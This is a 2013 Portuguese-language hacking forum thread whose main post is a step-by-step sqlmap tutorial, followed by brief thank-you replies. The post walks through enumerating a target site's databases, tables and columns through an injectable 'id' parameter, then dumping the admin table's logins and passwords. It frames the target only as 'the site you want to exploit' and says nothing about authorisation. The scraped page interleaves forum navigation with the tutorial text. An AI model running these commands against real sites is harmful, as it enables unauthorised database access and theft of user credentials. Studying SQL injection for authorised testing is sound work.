1. Search...
OLÁ ROBMENDES Unread Replies
Fórum The Anony Bay » T.A.B SECURITY »
- Bugs & Exploits »
Tutorial de SQLmap
RESPONDER NOVO TÓPICO NOTIFICAR MARCAR COMO NÃO LIDO ENVIAR ESTE TÓPICO IMPRIMIRPáginas: [1]
Tutorial de SQLmap
« Online: 19-04-2013, 03:23:58 »
CitarXiranha!
S.Administrador
Membro Participativo
Mensagens: 123
144 credits
View Inventory
Send Money To Xiranha!
Agradecimentos 202
"O medo só existe na mente dos
Curtir Seja o primeiro de seus amigos a curtir isso.
Oque é SQLmap ?
Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de
vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de
oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o
sistema de banco de dados se for possivel.
Para ver os comandos, basta digitar
Código: [Selecionar]
python sqlmap.py -h
Estudo
Após você ter o site que deseja explorar, digite
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 --dbs
--dbs é para descobrir a(s) database(s) que contem no site
O resultado será mais ou menos assim:
Código: [Selecionar]
[ * ] database_do_site<br />[ * ] information_schema
Após descobrir a(s) data base(s), digite
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site --tables
« tópico anterior tópico seguinte »
Autor Tópico: Tutorial de SQLmap (Lida 108 vezes)
Início AjudaAjuda BuscaBusca Editar PerfilEditar Perfil Minhas MensagensMinhas Mensagens Today's PostsToday's Posts ShopShop MembrosMembros SairSair
TweetTweet 0 0
2. Fracos"
--tables é para descobrir as tabelas que tem dentro da database
O resultado será mais ou menos assim:
Código: [Selecionar]
+---------------+<br />| admin |<br />| publicidade |<br />| teste |<br />+----------
Após descobrir as tabelas, digite :
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin --columns
--columns é para descobrir as colunas que tem dentro da tabela escolhida
O resultado será mais ou menos assim :
Código: [Selecionar]
+--------+--------------+<br />| Column | Type |<br />+--------+--------------+<br />| ID | in
Após descobrir as colunas, digite :
Código: [Selecionar]
python sqlmap.py -u http://www.sitedesejado.com.br/index.php?id=6 -D database_do_site -T admin -C 'login,s
--dump é para extrair os dados do site. mas não é qualquer dado, tem que estar dentro da coluna escolhida, e você
tem que escolher o que extrair da coluna, no caso eu extrai os logins e senhas que estão salvo dentro da coluna
De uma forma, os logins e senhas vão aparecer na própria shell, mas também ira ser extraída, para um arquivo dentro da
pasta
/pentest/database/sqlmap/output/sitedesejado.com.br/dump/database_do_site/admin.csv
Reportar ao moderador Registrado
"não Clique"
Re:Tutorial de SQLmap
« Resposta #1 Online: 19-04-2013, 06:30:43 »
CitarPseudônimo
Administrador
Membro Expert
Curtir Seja o primeiro de seus amigos a curtir isso.
Eita Rafa, obrigado pelo ótimo tutorial. Parabéns.
TweetTweet 0 0
3. Mensagens: 293
202 credits
View Inventory
Send Money To Pseudônimo
Agradecimentos 46
Reportar ao moderador Registrado
Re:Tutorial de SQLmap
« Resposta #2 Online: 28-04-2013, 14:30:36 »
Citarpnp
Novato
Mensagens: 11
90 credits
View Inventory
Send Money To pnp
Agradecimentos 0
Curtir Seja o primeiro de seus amigos a curtir isso.
ótimo Tutorial.
Reportar ao moderador Registrado
Re:Tutorial de SQLmap
« Resposta #3 Online: 25-06-2013, 00:10:53 »
CitarWhisper
Membro Participativo
Mensagens: 66
Curtir Seja o primeiro de seus amigos a curtir isso.
muito bom mesmo..
vlw..
Reportar ao moderador Registrado
TweetTweet 0 0
TweetTweet 0 0